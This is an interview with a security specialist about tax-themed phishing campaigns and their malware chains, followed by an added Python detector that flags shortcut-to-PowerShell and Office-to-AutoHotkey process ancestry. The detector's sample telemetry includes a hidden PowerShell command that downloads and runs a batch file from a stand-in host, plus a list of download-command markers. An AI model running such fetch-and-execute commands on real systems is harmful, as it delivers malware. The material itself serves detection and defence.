Rupert Marais is our in-house Security specialist with expertise in endpoint and device security, cybersecurity strategies, and network management. In this interview, we dive into the intricacies of recent tax-themed email attacks, the underlying mechanisms of various malware, and the sophisticated tactics used by cybercriminals. Rupert provides detailed insights into how these attacks are orchestrated and the significant impacts they have on organizations.
Can you provide an overview of the recent tax-themed email attacks Microsoft has reported?
These recent tax-themed email attacks are cleverly designed phishing campaigns that employ redirection tactics, such as URL shorteners and QR codes, to avoid detection. They often abuse legitimate services like file-hosting platforms and business profile pages to seem trustworthy. The objective is to lure unsuspecting users into clicking malicious links or opening harmful attachments, leading to credential theft or malware deployment.
What is the RaccoonO365 PhaaS platform and when did it first come to light?
RaccoonO365 is a phishing-as-a-service (PhaaS) platform that facilitates the delivery of phishing pages. This platform gained attention in early December 2024. Essentially, it allows cybercriminals to easily create and deploy phishing campaigns, targeting users’ credentials, often mimicking legitimate services to maximize their effectiveness.
Which types of malware and post-exploitation frameworks are mentioned as being delivered in these campaigns?
These phishing campaigns are noted for delivering a variety of malware, including remote access trojans (RATs) like Remcos RAT. They also distribute other malicious tools like Latrodectus, AHKBot, GuLoader, and the BruteRatel C4 (BRc4) post-exploitation framework. Each of these tools serves different malicious purposes, from gaining remote control over infected systems to data exfiltration and further exploitation.
Can you describe the specific campaign Microsoft spotted on February 6, 2025?
On February 6, 2025, Microsoft identified a significant phishing campaign that targeted the United States with hundreds of tax-themed emails. These emails attempted to deliver BRc4 and Latrodectus malware. The attacks were linked to Storm-0249, a known threat actor famous for using malware such as BazaLoader and IcedID.
How does the redirection process work in the attacks involving PDF attachments and fake Docusign pages?
In these attacks, PDF attachments contain links shortened via services like Rebrandly. When users click these links, they are redirected to a fake Docusign page. If the users’ system and IP address meet certain criteria, they are then presented with a JavaScript file that downloads an MSI file for BRc4, leading to the deployment of Latrodectus malware.
What methods were used in the second campaign detected between February 12 and 28, 2025?
The second campaign involved tax-themed phishing emails with no content in the body, featuring a PDF attachment with a QR code. This QR code directed users to phishing pages mimicking Microsoft 365 login screens, tricking them into entering their credentials. Over 2,300 organizations, particularly in the engineering, IT, and consulting sectors, were targeted during this wave of attacks.
In what way are QR codes being used in these phishing attacks and what purpose do they serve?
QR codes are utilized to disguise malicious URLs. When scanned, they direct users to links related to the RaccoonO365 PhaaS platform, often leading to fake login pages that harvest credentials. This method leverages the convenience and novelty of QR codes while bypassing traditional URL-based security measures.
Can you explain the infection chains involving AHKBot?
The AHKBot infection chain typically involves directing users to malicious Microsoft Excel files. Upon enabling macros in these files, a series of downloads occurs: first, an MSI file, then an AutoHotKey script, and finally, a Screenshotter module, which captures and exfiltrates screenshots from the compromised system.
What is the exact process through which GuLoader malware is delivered via email?
GuLoader campaigns trick users into clicking on a URL in a PDF attachment, leading to the download of a ZIP file. This ZIP contains shortcut files made to look like tax documents. When launched, these shortcuts use PowerShell to download a PDF and a batch file, which in turn downloads and executes the GuLoader malware, eventually installing Remcos RAT.
What were the findings related to a campaign that utilized Facebook to drive traffic to fake Windows 11 Pro download pages?
This campaign used fake Windows 11 Pro download pages to distribute Latrodectus malware via the BruteRatel tool. Facebook referrer URLs were seen, indicating that the platform was used to drive traffic to these fake download pages.
How are QR codes being used to disguise malicious URLs in widespread attacks?
QR codes are used to conceal malicious URLs by leveraging redirection mechanisms or exploiting legitimate websites’ open redirects. This technique helps attackers bypass URL-based security measures and deliver their payloads more effectively.
What are notable trends found in recent phishing and social engineering campaigns?
Recent campaigns have shown increased sophistication, using techniques like the browser-in-the-browser (BitB) attack to mimic legitimate login pages, hijacking email accounts to send bulk messages, and embedding malicious links in SVG files to bypass filters. Attackers also exploit trusted services like Adobe and DocuSign to evade secure email gateways.
Do you have any advice for our readers?
Stay vigilant about unexpected emails, especially those with attachments or links. Always verify the legitimacy of the source before taking any action. Use multifactor authentication and keep your security software updated to mitigate risks. Consciously adopting these habits can make a significant difference in staying protected from such phishing attacks.
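Editor's note: the block below is an added example and is not part of the interview, nor Microsoft's or Rupert's detection logic. It turns two of the infection chains described above (the GuLoader shortcut that uses PowerShell to fetch and run a batch file, and the AHKBot chain in which an Excel macro pulls an MSI and then an AutoHotKey script) into process-ancestry detection rules and runs them over constructed, Sysmon-like process-creation events. The event layout (pid, ppid, image, cmdline), the sample command lines, and the download-verb markers are assumptions made for the example; real telemetry will need field mapping and tuning.

```python
"""Process-ancestry detection for the shortcut->PowerShell->batch and
Office->MSI->AutoHotkey chains described in the interview.

Added example with constructed data. The event shape is an assumed,
Sysmon-like layout, not a real product's schema, and the command lines
below are invented for illustration (example.invalid is a reserved name).
"""
from dataclasses import dataclass
from typing import Dict, Iterator, List, Optional


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # executable name, lower-case, without path
    cmdline: str


# Constructed sample telemetry (not real logs): two suspicious chains, one benign.
SAMPLE_EVENTS: List[ProcEvent] = [
    ProcEvent(100, 1, "explorer.exe", "explorer.exe"),
    # GuLoader-style: a .lnk posing as a tax document starts PowerShell, which
    # downloads a batch file and hands it to cmd.exe.
    ProcEvent(200, 100, "powershell.exe",
              'powershell.exe -w hidden -c "iwr http://example.invalid/a '
              '-o $env:TEMP\\t.bat; cmd /c $env:TEMP\\t.bat"'),
    ProcEvent(201, 200, "cmd.exe", 'cmd.exe /c C:\\Users\\u\\AppData\\Local\\Temp\\t.bat'),
    # AHKBot-style: Excel macro -> msiexec installs a package -> AutoHotkey runs a script.
    ProcEvent(300, 100, "excel.exe", 'excel.exe "C:\\Users\\u\\Downloads\\Tax_Refund.xlsm"'),
    ProcEvent(301, 300, "msiexec.exe", 'msiexec.exe /i C:\\Users\\u\\AppData\\Local\\Temp\\x.msi /qn'),
    ProcEvent(302, 301, "autohotkey.exe", 'AutoHotkey.exe C:\\ProgramData\\x.ahk'),
    # Benign: an interactive PowerShell with no download or batch behaviour.
    ProcEvent(400, 100, "powershell.exe", "powershell.exe -NoProfile"),
]

# Assumed markers for "PowerShell fetched something"; extend for your environment.
DOWNLOAD_MARKERS = ("invoke-webrequest", "iwr ", "downloadfile", "downloadstring",
                    "start-bitstransfer", "curl ", "wget ")
OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}


def build_index(events: List[ProcEvent]) -> Dict[int, ProcEvent]:
    """Index events by pid so ancestry can be walked in O(depth)."""
    return {e.pid: e for e in events}


def ancestors(idx: Dict[int, ProcEvent], pid: int) -> Iterator[ProcEvent]:
    """Yield the ancestors of pid, nearest parent first; guards against pid-reuse cycles."""
    seen = set()
    e = idx.get(pid)
    while e is not None and e.ppid in idx and e.ppid not in seen:
        seen.add(e.ppid)
        e = idx[e.ppid]
        yield e


def flag_powershell_to_batch(idx: Dict[int, ProcEvent], e: ProcEvent) -> Optional[str]:
    """cmd.exe running a .bat beneath a PowerShell that downloaded something."""
    if e.image != "cmd.exe" or ".bat" not in e.cmdline.lower():
        return None
    for a in ancestors(idx, e.pid):
        if a.image == "powershell.exe" and any(m in a.cmdline.lower() for m in DOWNLOAD_MARKERS):
            return f"pid {e.pid}: batch file run under downloading PowerShell (pid {a.pid})"
    return None


def flag_office_to_autohotkey(idx: Dict[int, ProcEvent], e: ProcEvent) -> Optional[str]:
    """AutoHotkey interpreter descended (at any depth) from an Office application."""
    if e.image != "autohotkey.exe":
        return None
    for a in ancestors(idx, e.pid):
        if a.image in OFFICE_APPS:
            return f"pid {e.pid}: AutoHotkey launched beneath {a.image} (pid {a.pid})"
    return None


def detect(events: List[ProcEvent]) -> List[str]:
    """Run every rule over every event and return the alert strings."""
    idx = build_index(events)
    alerts: List[str] = []
    for e in events:
        for rule in (flag_powershell_to_batch, flag_office_to_autohotkey):
            hit = rule(idx, e)
            if hit:
                alerts.append(hit)
    return alerts


if __name__ == "__main__":
    for line in detect(SAMPLE_EVENTS):
        print(line)
```

Walking the full ancestry rather than checking only the immediate parent is what lets the Office rule fire even though msiexec.exe sits between Excel and the AutoHotkey interpreter; the same pattern covers the GuLoader chain where the shortcut itself never appears as a process and PowerShell shows up as a child of explorer.exe.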